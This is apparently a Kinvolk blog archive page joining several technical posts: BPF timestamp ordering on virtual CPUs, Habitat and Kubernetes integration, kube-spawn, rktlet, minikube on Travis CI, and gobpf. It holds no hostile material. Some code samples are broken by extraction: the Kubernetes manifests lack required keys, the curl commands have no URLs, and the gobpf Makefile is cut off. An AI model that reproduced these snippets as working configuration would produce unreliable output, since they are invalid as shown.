Follow us on Twitter to get updates on what Kinvolk is up to.

Timing issues when using BPF with virtual CPUs


After implementing the collecting of TCP connections using eBPF in Weave Scope (see our post on the Weaveworks blog) we faced an interesting bug that happened only in virtualized environments like AWS, but not on bare metal. The events retrieved via eBPF seemed to be received in the wrong chronological order. We are going to use this bug as an opportunity to discuss some interesting aspects of BPF and virtual CPUs (vCPUs).


Let’s describe in more detail the scenario and provide some background on Linux clocks.

Why is chronological order important for Scope?

Scope provides a visualization of network connections in distributed systems. To do this, Scope needs to maintain a list of current TCP connections. It does so by receiving TCP events from the kernel via the eBPF program we wrote, tcptracer-bpf. Scope can receive either TCP connect, accept, or close events and update its internal state accordingly.

If events were to be received in the wrong order–a TCP close before a TCP connect–Scope would not be able to make sense of the events; the first TCP close would not match any existing connection that Scope knows of, and the second TCP connect would add a connection in the Scope internal state that will never be removed.

TCP events sent from kernel space to userspace

TCP events sent from kernel space to userspace

How events are transferred from kernel to the Scope process?

Context switches and kernel/userspace transitions can be slow and we need an efficient way to transfer a large number of events. This is achieved using a perf ring buffer. A ring buffer or a circular buffer is a data structure that allows a writer to send events to a reader asynchronously. The perf subsystem in the Linux kernel has a ring buffer implementation that allows a writer in the kernel to send events to a reader in userspace. It is done without any expensive locking mechanism by using well-placed memory barriers.

On the kernel side, the BPF program writes an event in the ring buffer with the BPF helper function bpf_perf_event_output(), introduced in Linux 4.4. On the userspace side, we can read the events either from an mmaped memory region (fast), or from a bpf map file descriptor with the read() system call (slower). Scope uses the fast method.

However, as soon as the computer has more than one CPU, several TCP events could happen simultaneously; one per CPU for example. This means there could be several writers at the same time and we will not be able to use a single ring buffer for everything. The solution is simple; use a different ring buffer for each CPU. On the kernel side, each CPU will write into its own ring buffer and the userspace process can read sequentially from all ring buffers.

TCP events traveling through ring buffers.

TCP events traveling through ring buffers.

Multiple ring buffers introduces out-of-order events

Each ring buffer is normally ordered chronologically as expected because each CPU writes the events sequentially into the ring buffer. But on a busy system, there could be several events pending in each ring buffer. When the user-space process picks the events, at first it does not know whether the event from ring buffer cpu#0 happened before or after the event from ring buffer cpu#1.

Adding timestamps for sorting events

Fortunately, BPF has a simple way to address this: a bpf helper function called bpf_ktime_get_ns() introduced in Linux 4.1 gives us a timestamp in nanoseconds. The TCP event written on the ring buffer is a struct. We simply added a field in the struct with a timestamp. When the userspace program receives events from different ring buffers, we sort the events according to the timestamp.

The BPF program (in yellow) executed by a CPU calls two BPF helper functions: bpf_ktime_get_ns() and bpf_perf_event_output()

The BPF program (in yellow) executed by a CPU calls two BPF helper functions: bpf_ktime_get_ns() and bpf_perf_event_output()

Sorting and synchronization

Sorting is actually not that simple because we don’t just have a set of events to sort. Instead, we have a dynamic system where several sources of events are continuously giving the process new events. As a result when sorting the events received at some point in time, there could be a scenario where we receive a new event that has to be placed before the events we are currently sorting. This is like sorting a set without knowing the complete set of items to sort.

To solve this problem, Scope needs a means of synchronization. Before we start gathering events and sorting, we measure the time with clock_gettime(). Then, we read events from all the ring buffers but stop processing a ring buffer if it is empty or if it gives us an event with a timestamp after the time of clock_gettime(). It is done in this way so as to only sort the events that are emitted before the beginning of the collection. New events will only be sorted in the next iteration.

A word on different clocks

Linux has several clocks as you can see in the clock_gettime() man page. We need to use a monotonic clock, otherwise the timestamp from different events cannot be compared meaningfully. Non-monotonicity can come from clock updates from NTP, updates from other software (Google clock skew daemon), timezones, leap seconds, and other phenomena.

But also importantly, we need to use the same clock in the events (measured with the BPF helper function bpf_ktime_get_ns) and the userspace process (with system call clock_gettime), since we compare the two clocks. Fortunately, the BPF helper function gives us the equivalent of CLOCK_MONOTONIC.

Bugs in the Linux kernel can make the timestamp wrong. For example, a bug was introduced in 4.8 but was backported to older kernels by distros. The fix was included in 4.9 and also backported. For example, in Ubuntu, the bug was introduced in kernel 4.4.0-42 and it’s not fixed until kernel 4.4.0-51.

The problem with vCPUs

The above scenario requires strictly reliable timing. But vCPUs don’t make this straight-forward.

Events are still unordered sometimes

Despite implementing all of this, we still sometimes noticed that events were ordered incorrectly. It happened rarely, like once every few days, and only on EC2 instances–not on bare-metal. What explains the difference of behaviour between virtualized environments and bare-metal?

To understand the difference, we’ll need to take a closer look at the source code. Scope uses the library tcptracer-bpf to load the BPF programs. The BPF programs are actually quite complex because they need to handle different cases: IPv4 vs IPv6, the asynchronous nature of TCP connect and the difficulty of passing contextes between BPF functions. But, for the purpose of this race, we can simplify it to two function calls: bpf_ktime_get_ns() to measure the time bpf_perf_event_output() to write the event–including the timestamp–to the ring buffer

The way it was written, we assumed that the time between those two functions was negligible or at least constant. But in virtualized environments, virtual CPUs (vCPU) can randomly sleep, even inside BPF execution in kernel, depending on the hypervisor scheduling. So the time a BPF program takes to complete can vary from one execution to another.

Consider the following diagram:

Two CPUs executing the same BPF function concurrently

Two CPUs executing the same BPF function concurrently

With a vCPU, we have no guarantees with respect to how long a BPF program will take between the two function calls–we’ve seen up to 98ms. It means that the userspace program does not have a guarantee that it will receive all the events before a specific timestamp.

In effect, this means we can not rely on absolute timing consistency on virtualization environments. This, unfortunately, means implementers must take such a scenario into consideration.

Possible fixes

Any solution would have to ensure that the user-space Scope process waits enough time to have received the events from the different queues up to a specific time. One suggested solution was to regularly generate synchronization events on each CPU and deliver them on the same path in the ring buffers. This would ensure that one CPU is not sleeping for a long time without handling events.

But due to the difficulty of implementation and the rarity of the issue, we implemented a workaround by just detecting when the problem happens and restarting the BPF engine in tcptracer-bpf.


Investigating this bug and writing workaround patches for it made us write a reproducer using CPU affinity primitives (taskset) and explore several complex aspects of Linux systems: virtual CPUs in hypervisors, clocks, ring buffers, and of course eBPF.

We’d be interested to hear from others who have encountered such issues with vCPUs and especially those who have additional insight or other ideas for proper fixes.

Kinvolk is available for hire for Linux and Kubernetes based projects

Follow us on Twitter to get updates on what Kinvolk is up to.

Join the Kinvolk team at FOSDEM 2018!

FOSDEM, the premier European open source event that takes place in Brussels, is right around the corner! Most of the Kinvolk team is heading there for a collaborative weekend, with three of our engineers giving talks.

Kinvolk Talk Schedule

Sunday, February 4, 2018

  • 10:00 - 10:25: **Zeeshan Ali, “Rust memory management"**
    Zeeshan, software engineer at Kinvolk, will give a quick introduction to memory management concepts of Rust, a system of programming language that focuses on safety and performance simultaneously.

  • 11:30 - 11:50: **Iago López Galeiras, “State of the rkt container runtime and its Kubernetes integration"**
    Iago, technical lead & co-founder at Kinvolk, will be diving into rkt container runtime and its Kubernetes integration, specifically looking at the progress of rkt and rktlet and the Kubernetes CRI implementation of rkt.

  • 15:05 - 15:25: **Alban Crequy, “Exploring container image distribution with casync"**
    Alban, CTO and co-founder at Kinvolk, will explore container image distribution with casync, a content-addressable data synchronization tool.

We’re looking forward to seeing old friends and making new ones.

Follow us on Twitter to see what we are up to at the conference!

Automated Build to Kubernetes with Habitat Builder


Imagine a set of tools which allows you to not only build your codebase automatically each time you apply new changes but also to deploy to a cluster for testing, provided the build is successful. Once the smoke tests pass or the QA team gives the go ahead, the same artifact can be automatically deployed to production.

In this blog post we talk about such an experimental pipeline that we’ve built using Habitat Builder and Kubernetes. But first, let’s look at the building blocks.

What is Habitat and Habitat Builder?

Habitat is a tool by Chef that allows one to automate the deployment of applications. It allows developers to package their application for multiple environments like a container runtime or a VM.

One of Habitat’s components is Builder. It uses a file, which is part of the application codebase, to build a Habitat package out of it. A file for Habitat is similar to what a Dockerfile is to Docker, and like Docker, it outputs a Habitat artifact that has a .hart extension.

Habitat also has a concept called channels which are similar to tags. By default, a successful build is tagged under the unstable channel and users can use the concept of promotion to promote a specific build of a package to a different channel like stable, staging or production. Users can choose channel names for themselves and use the hab pkg promote command to promote a package to a specific channel.

Please check out the tutorials on the Habitat site for a more in-depth introduction to Habitat.

Habitat ❤ Kubernetes

Kubernetes is a platform that runs containerized applications and supports container scheduling, orchestration, and service discovery. Thus, while Kubernetes does the infrastructure management, Habitat manages the application packaging and deployment.

We will take a look at the available tools that help us integrate Habitat in a functioning Kubernetes cluster.

Habitat Operator

A Kubernetes Operator is an abstraction that takes care of running a more complex piece of software. It leverages the Kubernetes API, and manages and configures the application by hiding the complexities away from the end user. This allows a user to be able to focus on using the application for their purposes instead of dealing with deployment and configuration themselves. The Kinvolk team built a Habitat Operator with exactly these goals in mind.

Habitat Kubernetes Exporter

Recently, a new exporter was added to Habitat by the Kinvolk team that helps in integrating Habitat with Kubernetes. It creates and uploads a Docker image to a Docker registry, and returns a manifest that can be applied with kubectl. The output manifest file can be specified as a command line argument and it also accepts a custom Docker registry URL. This blog post covers this topic in more depth along with a demo at the end.

Automating Kubernetes Export

Today we are excited to show you a demo of a fully automated Habitat Builder to Kubernetes pipeline that we are currently working on together with the Habitat folks:

The video shows a private Habitat Builder instance re-building the it-works project, exporting a Docker image to Docker Hub and automatically deploying it to a local Kubernetes cluster through the Habitat Operator. Last but not leat, the service is promoted from unstable to testing automatically.

In the future, Kubernetes integration will allow you to set up not only seamless, automated deploys but also bring Habitat’s service promotion to services running in Kubernetes. Stay tuned!

If you want to follow our work (or set up the prototype yourself), you can find a detailed README here.


This is an exciting start to how both Habitat and Kubernetes can complement each other. If you are at KubeCon, stop by at the Habitat or Kinvolk booth to chat about Habitat and Kubernetes. You can also find us on the Habitat slack in the #general or #kubernetes channels.

Get started with Habitat on Kubernetes

Habitat is a project that aims to solve the problem of building, deploying and managing services. We at Kinvolk have been working on Kubernetes integration for Habitat in cooperation with Chef. This integration comes in the form of a Kubernetes controller called Habitat operator. The Habitat operator allows cluster administrators to fully utilize Habitat features inside their Kubernetes clusters, all the while maintaining high compatibility with the “Kubernetes way” of doing things. For more details about Habitat and the Habitat operator have a look at our introductory blog post.

In this guide we will explain how to use the Habitat operator to run and manage a Habitat-packaged application in a Kubernetes cluster on Google Kubernetes Engine (GKE). This guide assumes a basic understanding of Kubernetes.

We will deploy a simple web application which displays the number of times the page has been accessed.


We’re going to assume some initial setup is done. For example, you’ll need to have created an account on Google Cloud Platform and have already installed and configured the Google Cloud SDK as well as its beta component. Lastly, you’ll want to download kubectl so you can connect to the cluster.

Creating a cluster

To start, we’ll want to create a project on GCP to contain the cluster and all related settings. Project names are unique on GCP, so use one of your choosing in the following commands.

Create it with:

$ gcloud projects create habitat-on-kubernetes

We will then need to enable the “compute API” for the project we’ve just created. This API allows us to create clusters and containers.

$ gcloud service-management enable --project habitat-on-kubernetes

We also need to enable billing for our project, since we’re going to spin up some nodes in a cluster:

$ gcloud beta billing projects link hab-foobar --billing-account=$your-billing-id

Now we’re ready to create the cluster. We will have to choose a name and a zone in which the cluster will reside. You can list existing zones with:

$ gcloud compute zones list --project habitat-on-kubernetes

This following command sets the zone to “europe-west1-b” and the name to “habitat-cluster”. This command can take several minutes to complete.

$ gcloud container clusters create habitat-demo-cluster --project habitat-on-kubernetes --zone europe-west1-b

Deploying the operator

The next step is to deploy the Habitat operator. This is a component that runs in your cluster, and reacts to the creation and deletion of Habitat Custom Objects by creating, updating or deleting resources in the cluster. Like all objects, operators are deployed with a yaml manifest file. The contents of the manifest file are shown below:.

apiVersion: extensions/v1beta1
kind: Deployment
  name: habitat-operator
  replicas: 1
        name: habitat-operator
      - name: habitat-operator
        image: kinvolk/habitat-operator:v0.2.0

From the root of our demo application, we can then deploy the operator with:

kubectl create -f kubernetes/habitat-operator.yml

Deploying the demo application

With that done, we can finally deploy our demo application:

kind: Habitat
  name: habitat-demo-counter
  image: kinvolk/habitat-demo-counter
  count: 1
    topology: standalone
apiVersion: v1
kind: Service
  name: front
    habitat-name: habitat-demo-counter
  type: LoadBalancer
  - name: web
    targetPort: 8000
    port: 8000
    protocol: TCP

Just run the following command:

$ kubectl create -f kubernetes/habitat-demo-counter.yml

We can monitor the status of our deployment with kubectl get pod -w. Once all pods are in the “Running” state, our application is fully deployed and ready to interact with.

Let’s find out the public IP address of our application by running kubectl get services front. The IP will be listed under the column “External IP”.

Let’s test it out by going to the service’s IP and port 8000, where we should see the app’s landing page, with the view counter. The counter increases every time we refresh the page, and can be reset with the “Reset” button.

To see this in action, watch the video below.

The Ruby web application has been packaged with Habitat, and is now running as a Habitat service in a Docker container deployed on Kubernetes. Congratulations!

What's new in kube-spawn

There’s been a number of changes in kube-spawn kube-spawn since we announced it.

The main focus of the recent developments was improving the CLI, supporting several clusters running in parallel, and enabling developers to test Kubernetes patches easily. In addition, we’ve added a bunch of documentation, improved error messages and, of course, fixed a lot of bugs.

CLI redesign

We’ve completely redesigned the CLI commands used to interact with kube-spawn. You can now use create to generate the cluster environment, and then start to boot and provision the cluster. The convenience up command does the two steps in one so you can quickly get a cluster with only one command.

Once a cluster is up and running you can use stop to stop it and keep it there to start it again later, or restart to stop and start the cluster.

The command destroy will take a cluster in the stopped or running state and remove it completely, including any disk space the cluster was using.

The following diagram provides a visualization of the CLI workflow.

Multi-cluster support

Previously, users could only run one cluster at the time. With the flag --cluster-name flag, running multiple clusters in parallel is now possible.

All the CLI operations can take --cluster-name to specify which cluster you’re referring to. To see your currently created clusters, a new command list was added to kube-spawn.

This is especially useful when you want to test how your app behaves in different Kubernetes versions or, as a Kubernetes developer, when you made a change to Kubernetes itself and want to compare a cluster without changes and another with your change side-by-side. Which leads us to the next feature.

Dev workflow support

kube-spawn makes testing changes to Kubernetes really easy. You just need to build your Hyperkube Docker image with a particular VERSION tag. Once that’s built, you need to start kube-spawn with the --dev flag, and set --hyperkube-tag to the same name you used when building the Hyperkube image.

Taking advantage of the aforementioned multi-cluster support, you can build current Kubernetes master, start a cluster with --cluster-name=master, build Kubernetes your patch, and start another cluster with --cluster-name=fix. You’ll now have two clusters to check how your patch behaves in comparison with an unpatched Kubernetes.

You can find a detailed step-by-step example of this in kube-spawn’s documentation.

kube-spawn, a certified Kubernetes distribution

certified kubernetes

We’ve successfully run the Kubernetes Software Conformance Certification tests based on Sonobuoy for Kubernetes v1.7 and v1.8. We’ve submitted the results to CNCF and they merged our PRs. This means kube-spawn is now a certified Kubernetes distribution.


With the above additions, we feel like kube-spawn is one of the best tools for developing on Linux with, and on, Kubernetes.

If you want to try it out, we’ve just released kube-spawn v0.2.1. We look forward to your feedback and welcome issues or PRs on the Github project.

Introducing the Habitat Kubernetes Exporter

At Kinvolk, we’ve been working with the Habitat team at Chef to make Habitat-packaged applications run well in Kubernetes.

The first step on this journey was the Habitat operator for Kubernetes which my colleague, Lili, already wrote about. The second part of this project —the focus of this post— is to make it easier to deploy Habitat apps to a Kubernetes cluster that is running the Habitat operator.

Exporting to Kubernetes

To that end, we’d like to introduce the Habitat Kubernetes exporter.

The Kubernetes exporter is an additional command line subcommand to the standard Habitat CLI interface. It leverages the existing Docker image export functionality and, additionally, generates a Kubernetes manifest that can be deployed to a Kubernetes cluster running the Habitat operator.

The command line for the Kubernetes exporter is:

$ hab pkg export kubernetes ORIGIN/NAME

Run hab pkg export kubernetes --help to see the full list of available options and general help.


Let’s take a look at the Habitat Kubernetes exporter in action.

As you can see, the Habitat Kubernetes exporter helps you to deploy your applications that are built and packaged with Habitat on a Kubernetes cluster by generating the needed manifest files.

More to come

We’ve got more exciting ideas for making Habitat and Habitat Builder work even more seamlessly with Kubernetes. So stay tuned for more.

Kubernetes The Hab Way

How does a Kubernetes setup the Hab(itat) way look? In this blog post we will explore how to use Habitat’s application automation to set up and run a Kubernetes cluster from scratch, based on the well-known “Kubernetes The Hard Way” manual by Kelsey Hightower.

A detailed README with step-by-step instructions and a Vagrant environment can be found in the Kubernetes The Hab Way repository.

Kubernetes Core Components

To recap, let’s have a brief look on the building blocks of a Kubernetes cluster and their purpose:

  • etcd, the distributed key value store used by Kubernetes for persistent storage,
  • the API server, the API frontend to the cluster’s shared state,
  • the controller manager, responsible for ensuring the cluster reflects the configured state,
  • the scheduler, responsible for distributing workloads on the cluster,
  • the network proxy, for service network configuration on cluster nodes and
  • the kubelet, the “primary node agent”.

For each of the components above, you can now find core packages on Alternatively, you can fork the upstream core plans or build your own packages from scratch. Habitat studio makes this process easy.

By packing Kubernetes components with Habitat, we can use Habitat’s application delivery pipeline and service automation, and benefit from it as any other Habitat-managed application.

Deploying services

Deployment of all services follows the same pattern: first loading the service and then applying custom configuration. Let’s have a look at the setup of etcd to understand how this works in detail:

To load the service with default configuration, we use the hab sup subcommand:

$ sudo hab sup load core/etcd --topology leader

Then we apply custom configuration. For Kubernetes we want to use client and peer certificate authentication instead of autogenerated SSL certificates. We have to upload the certificate files and change the corresponding etcd configuration parameters:

$ for f in /vagrant/certificates/{etcd.pem,etcd-key.pem,ca.pem}; do sudo hab file upload etcd.default 1 "${f}"; done

$ cat /vagrant/config/svc-etcd.toml
etcd-auto-tls = "false"
etcd-http-proto = "https"

etcd-client-cert-auth = "true"
etcd-cert-file = "files/etcd.pem"
etcd-key-file = "files/etcd-key.pem"
etcd-trusted-ca-file = "files/ca.pem"

etcd-peer-client-cert-auth = "true"
etcd-peer-cert-file = "files/etcd.pem"
etcd-peer-key-file = "files/etcd-key.pem"
etcd-peer-trusted-ca-file = "files/ca.pem"

$ sudo hab config apply etcd.default 1 /vagrant/config/svc-etcd.toml

Since service configuration with Habitat is per service group, we don’t have to do this for each member instance of etcd. The Habitat supervisor will distribute the configuration and files to all instances and reload the service automatically.

If you follow the step-by-step setup on GitHub, you will notice the same pattern applies to all components

Per-instance configuration

Sometimes, each instance of a service requires custom configuration parameters or files, though. With Habitat all configuration is shared within the service group and it’s not possible to provide configuration to a single instance only. For this case we have to fall back to “traditional infrastructure provisioning”. Also, all files are limited to 4096 bytes which is sometimes not enough.

In the Kubernetes setup, each kubelet needs a custom kubeconfig, CNI configuration, and a personal node certificate. For this we create a directory (/var/lib/kubelet-config/) and place the files there before loading the service. The Habitat service configuration then points to files in that directory:

$ cat config/svc-kubelet.toml
kubeconfig = "/var/lib/kubelet-config/kubeconfig"

client-ca-file = "/var/lib/kubelet-config/ca.pem"

tls-cert-file = "/var/lib/kubelet-config/node.pem"
tls-private-key-file = "/var/lib/kubelet-config/node-key.pem"

cni-conf-dir = "/var/lib/kubelet-config/cni/"

Automatic service updates

If desired, Habitat services can be automatically updated by the supervisor once a new version is published on a channel by loading a service with --strategy set to either at-once or rolling. By default, automatic updates are disabled. With this, Kubernetes components can be self-updating. An interesting topic that could be explored in the future.


We have demonstrated how Habitat can be used to build, setup, and run Kubernetes cluster components in the same way as any other application.

If you are interested in using Habitat to manage your Kubernetes cluster, keep an eye on this blog and the “Kubernetes The Hab Way” repo for future updates and improvements. Also, have a look at the Habitat operator, a Kubernetes operator for Habitat services, that allows you to run Habitat services on Kubernetes.

Announcing the Initial Release of rktlet, the rkt CRI Implementation

We are happy to announce the initial release of rktlet, the rkt implementation of the Kubernetes Container Runtime Interface. This is a preview release, and is not meant for production workloads.

When using rktlet, all container workloads are run with the rkt container runtime.

About rkt

The rkt container runtime is unique amongst container runtimes in that, once rkt is finished setting up the pod and starting the application, no rkt code is left running. rkt also takes a security-first approach, not allowing insecure functionality unless the user explicitly disables security features. And rkt is pod-native, matching ideally with the Kubernetes concept of pods. In addition, rkt prefers to integrate and drive improvements into existing tools, rather than reinvent things. And lastly, rkt allows for running apps in various isolation environments — container, VM or host/none.

rkt support in Kubernetes

With this initial release of rktlet, rkt currently has two Kubernetes implementations. Original rkt support for Kubernetes was introduced in Kubernetes version 1.3. That implementation — which goes by the name rktnetes — resides in the core of Kubernetes. Just as rkt itself kickstarted the drive towards standards in containers, this original rkt integration also spurred the introduction of a standard interface within Kubernetes to enable adding support for other container runtimes. This interface is known as the Kubernetes Container Runtime Interface (CRI).

With the Kubernetes CRI, container runtimes have a clear path towards integrating with Kubernetes. rktlet is the rkt implementation of that interface.

Project goals

The goal is to make rktlet the preferred means to run workloads with rkt in Kubernetes. But companies like Blablacar rely on the Kubernetes-internal implementation of rkt to run their infrastructure. Thus, we cannot just remove that implementation without having a viable alternative.

rktlet currently passes 129 of the 145 Kubernetes end-to-end conformance tests. We aim to have full compliance. Later in this article, we’ll look at what needs remain to get there.

Once rktlet it ready, the plan is to deprecate the rkt implementation in the core of Kubernetes.

How rktlet works

rktlet is a daemon that communicates with the kubelet via gRPC. The CRI is the interface by which kubelet and rktlet communicate. The main CRI methods are

  • RunPodSandbox(),
  • PodSandboxStatus(),
  • CreateContainer(),
  • StartContainer(),
  • StopPodSandbox(),
  • ListContainers(),
  • etc.

These methods handle lifecycle management and gather state.

To create pods, rktlet creates a transient systemd service using systemd-run with the appropriate rkt command line invocation. Subsequent actions like adding and removing containers to and from the pods, respectively, are done by calling the rkt command line tool.

The following component diagram provides a visualization of what we’ve described.

To try out rktlet, follow the Getting Started guide.

Driving rkt development

Work on rktlet has spurred a couple new features inside of rkt itself which we’ll take a moment to highlight.

Pod manipulation

rkt has always been pod-native, but the pods themselves were immutable. The original design did not allow for actions such as starting, stopping, or adding apps to a pod. These features were added to rkt in order to be CRI conformant. This work is described in the app level API document

Logging and attaching

Historically, apps in rkt have offloaded logging to a sidecar service — by default systemd-journald — that multiplexes their output to the outside world. The sidecar service handled logging and interactive applications reused a parent TTY.

But the CRI defines a logging format that is plaintext whereas systemd-journald’s output format is binary. Moreover, Kubernetes has an attaching feature that couldn’t be implemented with the old design.

To solve these problems, a component called iottymux was implemented. When enabled, it replaces systemd-journald completely; providing app logs that are formatted to be CRI compatible and the needed logic for the attach feature.

For a more detailed description of this design, check out the log attach design document.

Future work for rktlet

rktlet still needs work before it’s ready for production workloads and be 100% CRI compliant. Some of the work that still needs to be done is…

Join the team

If you’d like to join the effort, rktlet offers ample chances to get involved. Ongoing work is discussed in the #sig-node-rkt Kubernetes Slack channel. If you’re at Kubecon North America in Austin, please come by the rkt salon to talk about rkt and rktlet.


Thanks to all those that have contributed to rktlet and to CoreOS, Blablacar, CNCF and our team at Kinvolk for supporting its development.

Running Kubernetes on Travis CI with minikube

It is not easily possible to run Kubernetes on Travis CI, as most methods of setting up a cluster need to create resources on AWS, or another cloud provider. And setting up VMs is also not possible as Travis CI doesn’t allow nested virtualization. This post explains how to use minikube without additional resources, with a few simple steps.

Our use case

As we are currently working with Chef on a project to integrate Habitat with Kubernetes(Habitat Operator), we needed a way to run the end-to-end tests on every pull request. Locally we use minikube, a tool to setup a local one-node Kubernetes cluster for development, or when we need a multi-node cluster, kube-spawn. But for automated CI tests we only currently require a single node setup. So we decided to use minikube to be able to easily catch any failed tests and debug and reproduce those locally.

Typically minikube requires a virtual machine to setup Kubernetes. One day this tweet was shared in our Slack. It seems that minikube has a not-so-well-documented way of running Kubernetes with no need for virtualization as it sets up localkube, a single binary for kubernetes that is executed in a Docker container and Travis CI already has Docker support. There is a warning against running this locally, but since we only use it on Travis CI, in an ephemeral environment, we concluded that this is an acceptable use case.

The setup

So this is what our setup looks like. Following is the example .travis.yml file:

sudo: required


- curl -Lo kubectl && chmod +x kubectl && sudo mv kubectl /usr/local/bin/
- curl -Lo minikube && chmod +x minikube && sudo mv minikube /usr/local/bin/
- sudo minikube start --vm-driver=none --kubernetes-version=v1.7.0
- minikube update-context
- JSONPATH='{range .items[*]}{}:{range @.status.conditions[*]}{@.type}={@.status};{end}{end}'; until kubectl get nodes -o jsonpath="$JSONPATH" 2>&1 | grep -q "Ready=True"; do sleep 1; done

How it works

First, it installs kubectl, which is a requirement of minikube. The need for sudo: required comes from minikube’s starting processes, which requires to be root. Having set the enviorment variable CHANGE_MINIKUBE_NONE_USER, minikube will automatically move config files to the appropriate place as well as adjust the permissions respectively. When using the none driver, the kubectl config and credentials generated will be owned by root and will appear in the root user’s home directory. The none driver then does the heavy lifting of setting up localkube on the host. Then the kubeconfig is updated with minikube update-context. And lastly we wait for Kubernetes to be up and ready.


This work is already being used in the Habitat Operator. For a simple live example setup have a look at this repo. If you have any questions feel free to ping me on twitter @LiliCosic.

Follow Kinvolk on twitter to get notified when new blog posts go live.

Habitat Operator - Running Habitat Services with Kubernetes

For the last few months, we’ve been working with the Habitat team at Chef to make Habitat-packaged applications run well in Kubernetes. The result of this collaboration is the Habitat Operator, a Kubernetes controller used to deploy, configure and manage applications packaged with Habitat inside of Kubernetes. This article will give an overview of that work — particularly the issues to address, solutions to those issues, and future work.

Habitat Overview

For the uninitiated, Habitat is a project designed to address building, deploying and running applications.

Building applications

Applications are built from shell scripts known as “plans” which describe how to build the application, and may optionally include configurations files and lifecycle hooks. From the information in the plan, Habitat can create a package of the application.

Deploy applications

In order to run an application with a container runtime like Docker or rkt, Habitat supports exporting packages to a Docker container image. You can then upload the container image to a registry and use it to deploy applications to a container orchestration system like Kubernetes.

Running applications

Applications packaged with Habitat — hereafter referred to as simply as applications — support the following runtime features.

These features are available because all Habitat applications run under a supervisor process called a Supervisor. The Supervisor takes care of restarting, reconfiguring and gracefully terminating services. The Supervisor also allows multiple instances of applications to run with the Supervisor communicating with other Supervisors via a gossip protocol. These can connect to form a ring and establish Service Groups for sharing configuration data and establishing topologies.

Integration with Kubernetes

Many of the features that Habitat provides overlap with features that are provided in Kubernetes. Where there is overlap, the Habitat Operator tries to translate, or defer, to the Kubernetes-native mechanism. One design goal of the Habitat Operator is to allow Kubernetes users to use the Kubernetes CLI without fear that Habitat applications will become out of sync. For example, update strategies are core feature of Kubernetes and should be handled by Kubernetes.

For the features that do not overlap — such as topologies and application binding — the Habitat Operator ensures that these work within Kubernetes.

Joining the ring

One of the fundamental challenges we faced when conforming Habitat to Kubernetes was forming and joining a ring. Habitat uses the --peer flag which is passed an IP address of a previously started Supervisor. But in the Kubernetes world this is not possible as all pods need to be started with the exact same command line flags. In order to be able to do this within Kubernetes, implemented a new flag in Habitat itself, --peer-watch-file. This flag takes a file which should contain a list of one or more IP addresses to the peers in the Service Group it would like to join. Habitat uses this information to form the ring between the Supervisors. This is implemented in the Habitat Operator using a Kubernetes ConfigMap which is mounted into each pod.

Initial Configuration

Habitat allows for drawing configuration information from different sources. One of them is a user.toml file which is used for initial configuration and is not gossiped within the ring. Because there can be sensitive data in configuration files, we use Kubernetes Secrets for all configuration data. The Habitat Operator mounts configuration files in the place where Habitat expects it to be found and the application automatically picks up this configuration as it normally would. This mechanism will also be reused to support configuration updates in the future.


One of these is specifying the two different topologies that are supported in Habitat. The standalone topology — the default topology in Habitat — is used for applications that are independent of one another. With the leader/follower topology, the Supervisor handles leader election over the ring before the application starts. For this topology, three or more instances of an application must be available for a successful leader election to take place.

Ring encryption

A security feature of Habitat that we brought into the operator is securing the ring by encrypting all communications across the network.

Application binding

We also added an ability to do runtime binding, meaning that applications form a producer/consumer relationship at application start. The producer exports the configuration and the consumer, through the Supervisor ring, consumes that information. You can learn more about that in the demo below:

Future plans for Habitat operator

The Habitat Operator is in heavy development and we’re excited about the features that we have planned for the next months.

Export to Kubernetes

We’ve already started work on a exporter for Kubernetes. This will allow you to export the application you packaged with Habitat to a Docker image along with a generated manifest file that can be used to deploy directly to Kubernetes.

Dynamic configuration

As mentioned above, we are planning to extend the initial configuration and use the same logic for configuration updates. This work should be landing in Habitat very soon. With Habitat applications, configuration changes can be made without restarting pods. The behaviour for how to do configuration updates is defined in the applications Habitat plan.

Further Kubernetes integration and demos

We’re also looking into exporting to Helm charts in the near future. This could allow for bringing a large collection of Habitat-packaged to Kubernetes.

Another area to explore is integration between the Habitat Builder and Kubernetes. The ability to automatically recompile application, export images, and deploy to Kubernetes when dependencies are updated could bring great benefits to Habitat and Kubernetes users alike.


Please take the operator for a spin here. The first release is now available. All you need is an application packaged with Habitat and exported as Docker image, and that functionality is already in Habitat itself.

Note: The Habitat operator is compatible with Habitat version 0.36.0 onwards. If you have any questions feel free to ask on the #kubernetes channel in Habitat slack or open an issue on the Habitat operator.

Follow Kinvolk on twitter to get notified when new blog posts go live.

An update on gobpf - ELF loading, uprobes, more program types

Gophers by Ashley McNamara, Ponies by Deirdré Straughan - CC BY-NC-SA 4.0

Almost a year ago we introduced gobpf, a Go library to load and use eBPF programs from Go applications. Today we would like to give you a quick update on the changes and features added since then (i.e. the highlights of git log --oneline --no-merges --since="November 30th 2016" master).

Load BPF programs from ELF object files

With commit 869e637, gobpf was split into two subpackages ( and and learned to load BPF programs from ELF object files. This allows users to pre-build their programs with clang/LLVM and its BPF backend as an alternative to using the BPF Compiler Collection.

One project where we at Kinvolk used pre-built ELF objects is the TCP tracer that we wrote for Weave Scope. Putting the program into the library allows us to go get and vendor the tracer as any other Go dependency.

Another important result of using the ELF loading mechanism is that the Scope container images are much smaller, as bcc and clang are not included and don’t add to the container image size.

Let’s see how this is done in practice by building a demo program to log open(2) syscalls to the ftrace trace_pipe:

// program.c

#include <linux/kconfig.h>
#include <linux/bpf.h>

#include <uapi/linux/ptrace.h>

// definitions of bpf helper functions we need, as found in

#define SEC(NAME) __attribute__((section(NAME), used))

#define PT_REGS_PARM1(x) ((x)->di)

static int (*bpf_probe_read)(void *dst, int size, void *unsafe_ptr) =
        (void *) BPF_FUNC_probe_read;
static int (*bpf_trace_printk)(const char *fmt, int fmt_size, ...) =
        (void *) BPF_FUNC_trace_printk;

#define printt(fmt, ...)                                                   \
        ({                                                                 \
                char ____fmt[] = fmt;                                      \
                bpf_trace_printk(____fmt, sizeof(____fmt), ##__VA_ARGS__); \

// the kprobe

int kprobe__sys_open(struct pt_regs *ctx)
        char filename[256];

        bpf_probe_read(filename, sizeof(filename), (void *)PT_REGS_PARM1(ctx));

        printt("open(%s)\n", filename);

        return 0;

char _license[] SEC("license") = "GPL";
// this number will be interpreted by the elf loader
// to set the current running kernel version
__u32 _version SEC("version") = 0xFFFFFFFE;

On a Debian system, the corresponding Makefile could look like this:

# Makefile
# …

uname=$(shell uname -r)

        clang \
                -D__KERNEL__ \
                -O2 -emit-llvm -c program.c \
                -I /lib/modules/$(uname)/source/include \
                -I /lib/modules/$(uname)/source/arch/x86/include \
                -I /lib/modules/$(uname)/build/include \
